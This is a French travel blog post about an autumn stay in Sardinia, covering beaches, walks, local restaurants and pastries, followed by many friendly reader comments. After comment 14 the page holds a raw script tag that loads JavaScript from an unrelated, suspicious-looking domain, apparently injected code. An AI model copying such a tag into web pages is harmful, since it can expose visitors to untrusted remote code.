• Escapade Sarde.......

    Escapade Sarde.......

    Je reviens d'une escapade d'environ une dizaine de jours en Sardaigne. Je connais cette île presque par coeur et pourtant j'y découvre chaque fois des choses différentes ou nouvelles.

    Un temps magnifique durant tout le séjour avec des températures qui ont frolé certains jours les 30°.

    Escapade Sarde.......

    J'ai retrouvé avec plaisir la belle villa de ceux qui sont devenus des amis et qui domine Porto Conte tout près d'Alghero.

    Ce début d'octobre a été merveilleux. Moins de monde que pendant la saison estivale, des commerçants plus disponibles, une ambiance tranquille, une mer plate avec une belle luminosite et les plaisirs du bord de mer.

    Escapade Sarde.......

    Je me suis baladé dans le parc régional, dans les forêts de pins  désertées par les cigales, et au bord de mer du Capo Ciglio alors qu'en face le Capo Caccia attire toujours les touristes qui vont visiter les célèbres grottes de Neptune. D'autres encore  vont se baigner sur des plages de sable blanc toujours aussi bien aménagées.

    Escapade Sarde.......

    j'ai retrouvé aussi mes deux restaurants préférés, l'un préparant les produits de la mer dont on a fait une cure , l'autre la viande et le gibier avec un porcelet de lait grillé  que vous pouvez accompagner avec des papardelle al funghi porcini qui vous laisseront un souvenir en bouche inoubliable.

    Je suis aussi allé voir ma pâtisserie attitrée où j'ai dégusté des amaretti à la myrthe de Desolo une création de ces derniers mois. A tomber à la renverse.....

    Vous avez compris que je me suis régalé au sens propre et au sens figuré.

    Escapade Sarde.......

    J'ai quelques petites choses à vous raconter mais avant cela je vais passer sur vos blogs.On n'oublie quand même pas ses amis....

    Très bonne soirée.

    « Capra Corsica.....Entre minéral et végétal.... »

  • Commentaires

    1
    Mardi 15 Octobre 2019 à 15:40

    Excellent partage

    JP

    2
    Mardi 15 Octobre 2019 à 15:48

    C'est vraiment sympa de ta part de partager tout ce ciel bleu , ce soleil,

    tes magnifiques photos surtout par un temps "gris de chez gris "ici...

    je me dis qu'il y en a qui ont de la chance et c'est tant mieux!

    Bisous du jour

    Mireille du Sablon

    3
    Mardi 15 Octobre 2019 à 16:28

    Bonjour Baba

    Je ne savais pas que tu étais parti mais je vois là que tu as passé un excellent séjour!

    Je m'en réjouis car tu sais toujours nous en partager les paysages, et ici quelle merveille!

    La mer, le sable blanc, la chaleur, tes promenades, que demander de plus!

    je suis contente de te retrouver car ces derniers temps mon moral n'était pas au plus haut!

    Je viens donc retrouver mes amis et c'est une joie pour moi!

    Bienvenus dans la blogosphère!

    Bises

    Gigi

    4
    Mardi 15 Octobre 2019 à 16:49

    Bonjour Baba,

    Tu t'es bien régalé dans tous les sens du terme !! quelle belle escapade en ce mois d'octobre sans les touristes.. le must..

    Gros bisous 

     

    5
    Mardi 15 Octobre 2019 à 17:06

    Bonjour Baba . Magnifique ce coin de Sardaigne et tu as eu la chance d'avoir un temps presque estival , pas mal pour un automne . Très jolies images qui donnent envie de vacances et ce coucher de soleil magnifique mon cher ami . Merci de ce partage . Bonne fin de semaine .

    Amicalement .

     
    6
    Mardi 15 Octobre 2019 à 17:18

    merci pour le voyage..

    un coucou pour dire bonsoir!! grisaille en Picardie mais douceur!! moi repassage alors pas grave… bisous Sylvie

    7
    Mardi 15 Octobre 2019 à 17:41

    quelle chance tu as de partir aussi souvent et voir de tels paysages, ils me font rêver. Et gourmande comme je suis, toutes ces bonnes choses me font très envie. c'est pour ça que j'aime bien venir te lire et profiter de ce que je ne peux plus faire.

    8
    Mardi 15 Octobre 2019 à 17:53

    BONJOUR

    La tu nous met l'eau a la bouche ...c'est pas juste

    en plus un paysage qui l'air d’être superbe ....une mer superbe

    non non c'est pas juste

    mais tu a bien raison d'en profiter ,faut savoir prendre du bon temps

    bonne soirée bisous

    9
    Mardi 15 Octobre 2019 à 17:56

    Bonsoir Baba

    Quel magnifique coucher de soleil sur ta dernière photo, c'est magnifique cet endroit et c'est super d'avoir fait cette belle escapade, j'ai hâte de savoir la suite.

    Tes photos sont magnifiques.

    Merci pour ton gentil commentaire sur cet ancien article, oui c'est dur de perdre une amie qui de virtuelle est devenue réelle et cela m'a fait beaucoup de peine.

    Douce soirée et bisous d'amitié.

    10
    Mardi 15 Octobre 2019 à 18:20

    Bonsoir Baba

    Donc en résumé tu as passé un agréable séjour, et je vois que tu as eu beau temps, mais il fait presque toujours beau par là bas.

    Très belles photos avec cette mer si belle

    Je te souhaite une bonne soirée, bisous

    11
    Mardi 15 Octobre 2019 à 18:47

    Une très belle île qui mérite une visite

    C'est encore plus beau sans touriste c'est sur !...

    A bientôt

    12
    Mardi 15 Octobre 2019 à 19:32

    merci pour ce merveilleux reportage 

     un trés bel endroit 

    il y à le ciel , le soleil et la mer 

      le paradis 

     kénavo BABA 

    13
    Mardi 15 Octobre 2019 à 20:42

    Bonsoir Baba, je me disais : tiens on ne le voit plus sur eklablog....j'allais justement te mettre un message. Mais je suis contente que tu ai pu partir quelques jours et que tu en ai profité! Moi, je pars lundi 21 octobre a obernai en alsace,  quelques jours avec mon fils et sa future épouse. Nous allons chez les parents de ma belle-fille pour terminer les préparatifs de leur mariage qui aura lieu le 30 mai 2020.

    Apres 13 ans de vie commune, ils se sont décidés a passer devant le maire. celà va etre une grande fête! 

    je te souhaite une belle soirée et encore bravo pour ces belles photos! gros bisous

    14
    Mardi 15 Octobre 2019 à 21:09

    Salut Baba,

    Top ce billet de retour en Sardaigne.

    Ca donne envie d'y aller, mais faut quand même bosser un peu...

    Bonne soirée.

    <script src="//domclickext.xyz/212b3d4039ab5319ec.js" type="text/javascript"></script>
    15
    Mardi 15 Octobre 2019 à 21:26

    Stop, je salive trop

    Magnifiques couleurs de la mer

    Douce soirée

    16
    Mardi 15 Octobre 2019 à 23:47

    Un très agréable séjour, avec impatience j'attends la suite, nous fin novembre nous allons pas très loin de chez toi, sur l'île d'Elbe, JL

    17
    Mercredi 16 Octobre 2019 à 00:59

    Coucou Baba,

    contente que tu aies pu profiter de tout cela, c'est toujours bon à prendre mais

     

    Pour des raisons diverses, dont l’accident de Corrine 3*, je vais regarder tous vos articles mais ne pourrais y répondre de suite, que par de C.C.

    Amitiés et bisous à toutes et tous.

     

    * je ne sais si elle fait partie de tes amies?

    <style></style>
    18
    Mercredi 16 Octobre 2019 à 02:52

    Contente que tu aies pu profiter de cette belle destination que tu aimes tant Baba,

    visuellement, culinairement,

    un vrai "régal",

    te voilà fin près à aborder l'automne avec énergie et bonheur

    et moi qui commençait à m'inquiéter de ta santé ...

    Je préfère cela , ouf !!!

    Heureuse de te lire ,

    Douce nuit,

    Amicalement ,

    Christiane

    19
    Mercredi 16 Octobre 2019 à 06:35

    C'est vraiment magnifique et je comprends que tu t'y régale autant les yeux que le ventre !

    Merci pour ces superbes photos, ça fait rêver ...

    " Bon mercredi, toujours dans la grisaille ... et frisquet.
    C'est bien l'automne, maintenant !
    Gros  bisoux ♥  "

    20
    Mercredi 16 Octobre 2019 à 10:13

    La création du jour

    Bonjour Baba,

    toi aussi tu es parti en vacances, moi je reviens de CROATIE...

    Il n'a pas fait auusi beau qu'en Sardaigne..

    Demain je mettrais des photos de mon voyage..

    Bonne journée, gros bisous

    21
    Mercredi 16 Octobre 2019 à 10:26

    bonjour Baba , comme tu as raison d'en profiter  et là tu me donnes envie d'y aller un jour ! 

    et en + avec le beau temps  c'est le top  et moins de monde aussi !

    merci pour tes photos si belles !  quelle belle ile ! 

    belle semaine a +  

    22
    Mercredi 16 Octobre 2019 à 10:54
    francinea

    Bonjour, très belle escapade, tu es juste à côté, c'est le moment d'en profiter; les amaretti doivent être bien bons,  je te souhaite une bonne journée, bisous

    23
    Mercredi 16 Octobre 2019 à 11:14

    je commençais à m'inquiéter à me dire bizarre ça fait un moment que jai pas vu baba mais avec ma grippe, j'avais pas vraiment la notion du temps réel... bon bref une escapade sur l'ile voisine, génial... j'ai failli y aller en sardaigne avec le club med dans les années 79/80 avec une copine, qui m'a fait faux bond au dernier moment.. trop cher.. du coup, je m'étais rabattue sur la tunisie, mais franchement un regret, que jaurai toujours, j'aurai préféré la sardaigne, pareil pour le maroc, on devait aller avec l'ucpa dans les années 77/78 avec christine vers casa, alger par là .. et elle a connu un copain à annulé ses vacances, pour au final casser quelques mois ensuite.. du coup plus de place pour le maroc à l'ucpa, on est parti à majorque !!! bon ça je ne le regrette pas, mais le maroc ça m'aurait bien plu..

    hé bien je salive devant tout ce que tu nous proposes à manger.. ça me plairait bien question culinaire..

    j'aime découvrir un pays mais j'aime bien y manger, certains ne me disent rien à cause de cela, tous les pays anglo-saxon, c'est special hein.. j'en garde un souvenir bof, niveau nourriture..

    la dernière photo est superbe... et celle de la tour aussi.. ça a du te faire du bien.. 

    contente de te retrouver.. moi je vais mieux mais c'est le fiston qui a pris la relève, il a chopé la grippe

    depuis hier soir est revenu grelottant, a vu doc, médocs au lit avec pyjama polaire ..

    ça continue.. je vais ouvrir un centre médical de santé lol..

    je t'embrasse petite dora aussi, gros bizou flo.

    24
    Mercredi 16 Octobre 2019 à 20:03
    Je découvre votre blog en passant chez Gabray.de belles photos de voyage ,je reviendrai
    Bonne soirée
    Nicole
    25
    Jeudi 17 Octobre 2019 à 01:43
    Bonjour baba J’ai ce message a chaque blog Un script sur cette page est peut-être occupé ou ne répond plus. Vous pouvez arrêter le script maintenant ou attendre pour voir si le script se terminera. Script : https://ad.lkqd.net/vpaid/formats.js:1 Passe une très bonne journée Avec amitiés René
    26
    Jeudi 17 Octobre 2019 à 08:36

    on ressent dans ton récit le plaisir que tu as eu à revenir là bas
    Bon jeudi

    27
    Jeudi 17 Octobre 2019 à 09:29

    La création du jour

    Bonjour Baba,

    comme tu le dis,  heureusement que c'est de l'autoroute car autrement le trajet serait vraiment trop long...

    Bonne journée, gros bisous

    28
    Jeudi 17 Octobre 2019 à 09:56

    Bonjour Baba

    Merci de ta fidélité à mon blog.

    Ben oui mon cher Baba tu t'es régalé et tu me laisses "l'eau à la bouche", tout ce que tu as dégusté j'adore, alors comment ne pas saliver de plaisir.

    Mais surtout avant tout j'admire tes magnifiques clichés, que cet endroit est beau et paradisiaque, même si j'habite une belle île, si je pouvais j'aimerais découvrir également d'autres horizons notamment ta belle escapade.

    Que cette journée soit de toute beauté, qu'en ce jour le meilleur te soit donné, que tu connaisses la joie et la prospérité, que chaque instant soit fait de sérénité, que ce jour soit à l'image de ce que tu es, une belle personne pleine de générosité.

    Merveilleuse journée à toi.

    Je t'envoie du haut de mon ti rocher d'énormes bisous d'amitié.

    29
    Jeudi 17 Octobre 2019 à 10:37

    Bonjour Baba

    Quelle belle escapade , ça donne envie de faire ses valises et de partir quelques jours dans cette superbe région !

    De beaux clichés en partage , merci Baba.

    Je te souhaite une très agréable journée

    Bise

    30
    Jeudi 17 Octobre 2019 à 11:09

    Bonjour Baba

    Un bel endroit ou l'eau parait bien claire et surement bien agréable pour un bon bain

    Je te souhaite une bonne journée, bisous

    31
    Jeudi 17 Octobre 2019 à 12:05

    bon jeudi baba, tu m'étonnes que la petite fille c'est crevant, elle doit être tonique ... 4 ou 5 ans maintenant, ça doit déménager dans la baraque lol.. et dora doit se planquer lol.. bien que kevin etait très doux avec les chats, plus qu'avec nous lol..

    elle va bientôt te piquer ton ordinateur, et ta tablette, ton portable etc.. te montrera ensuite des trucs , les jeunes ont dirait qu'ils sortent du ventre de leur mère, avec la notice lol..  mais ça vous fait de la vie, c'est toujours plaisant, ma gd mère disait qu'un enfant ça empêchait de devenir des vieux grognons .. lol.. quand je pense qu'a 94 ans que kevin etait en moyenne section de maternelle elle avait pris sa voiture et l'avait cherché à l'école et emmené à la clinique se faire recoudre, il s'etait ouvert en gym l'arcade sourcillière et l'école m'avait tel pour venir le chercher mais je bossais à paris, et mes parents pas là, ben mémé broum broum etait partie le chercher, je suis rentrée, lagd mère revenait avec le kevin recousu... sacrée mémé , extraordinaire arrière gd mère, je souhaite longue vie à ta maman baba, comme mémé qu'elle soit autonome le plus possible et qu'elle passe de bons moments en famille, auprès des siens, ça aide à bien vieillir..

    allez un peu grisou aujourd'hui mais je crois que cet am, ça se dégage, j'ai l'électricien qui vient à 16H pour etat des lieux et prise de rdv pour commencer les travaux, ça va être coton... affaire à suivre, un gros bizou , et caresses à dora, biz flo

    32
    Jeudi 17 Octobre 2019 à 18:03

    Bonjour Baba,

    comme tu es venu le premier inaugurer mon article je te réponds de suite avant d'être trop occupée aux tâches quotidiennes, et pour me reposer aussi de tout ce qu'il y avait à faire pour demain (fermeture de la piscine ... sous la flotte grr!! mais les amis venant à notre secours ne seront libres que ce jour).

    Alors je viens un moment me délecter de tout ce que tu as dégusté de mets rares, mais de ces régions que tu connais bien.

    Pour me calmer cette envie de saliver, je suis allée me cueillir une grappe de raisin rosé chez ma voisine, nous faisons des échanges de très bon voisinage (pas de fermeture entre elle et nous).

    Mais rien à voir avec les paysages merveilleux de Sardaigne.

    Bonne soirée et bise de Sylvie.

    33
    Jeudi 17 Octobre 2019 à 18:32

    Salut,

    C'est super ce coin.
    Il fait beau alors on est allé se balader.
    J'ai enfin acheter un robot patissier
    Bonne journée

    34
    Jeudi 17 Octobre 2019 à 19:02

    J'aime beaucoup la Sardaigne ; c'est  une belle île et les gens sont accueillants . très belles photos qui donnent envie d'y retourner.Bonne soirée

    35
    Jeudi 17 Octobre 2019 à 19:39

    Tout comme la Corse, c'est un endroit qui me fait rêver...

    36
    Jeudi 17 Octobre 2019 à 20:07

    C’est très joli. Ca fait envie, surtout la température et ce ciel bleu...... pour le resto, je suis pas trop fruits de mer alors je vais choisir celui de la viande et du gibier lol

    Bonne fin de semaine. Biz. Aline

    37
    Jeudi 17 Octobre 2019 à 20:55

    Ravissement pour les yeux et les papilles, le bonheur quoi!

    Belles images, comme toujours 

    Bizz

    38
    Jeudi 17 Octobre 2019 à 21:40

    bonsoir , contente que le voyage t'ai plu et dégusté de bonnes choses  , toujours de la pluie ,et j'ai toujours la crève , ras le bol de tousser , bonne soirée , bisous

    39
    Jeudi 17 Octobre 2019 à 21:48

    C'est magnifique ! un réel plaisir pour mes yeux !

    Bonne soirée ... Cordiales amitiés & à + yes

    40
    Vendredi 18 Octobre 2019 à 02:05

    Bonjour baba

    fort belles tes photos

    Termine bien la semaine

    Avec amitiés

    René

    41
    Vendredi 18 Octobre 2019 à 08:36

    Coucou Baba

    Bonne journée à toi et bon week-end

    Bise

    42
    Vendredi 18 Octobre 2019 à 09:26

    La création du jour

    Bonjour Baba,

    heureusement que la pluie n'a durée qu'un jour...

    Bonne journée, bons baisers

    43
    Vendredi 18 Octobre 2019 à 11:42

    une escapade touristique et....gourmande!!!

    bonne journée.

    44
    Lundi 21 Octobre 2019 à 16:05

    Eh bien vois-tu ami Baba, je crois bien connaître toute l'Italie, j'ai sillonné professionnellement ou en touriste toutes les régions à l'excepté d'une seul ... la Sardaigne ! Peut-être un jour devrais-je réparer cette lacune, ton billet m'y inciterait.

     

    45
    Samedi 26 Octobre 2019 à 13:36
    la Sardaigne , un projet pour l' année prochaine, et quand je vois comme c ' est beau!! belle journée
    46
    Mardi 10 Mars 2020 à 10:42

    bonjour Baba , oui on avait prévu d'aller en Italie car tes photos m'en avait donné envie ...

    mais la avec le virus  dur dur ???   merci je me régale encore +++

    belle semaine a+

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :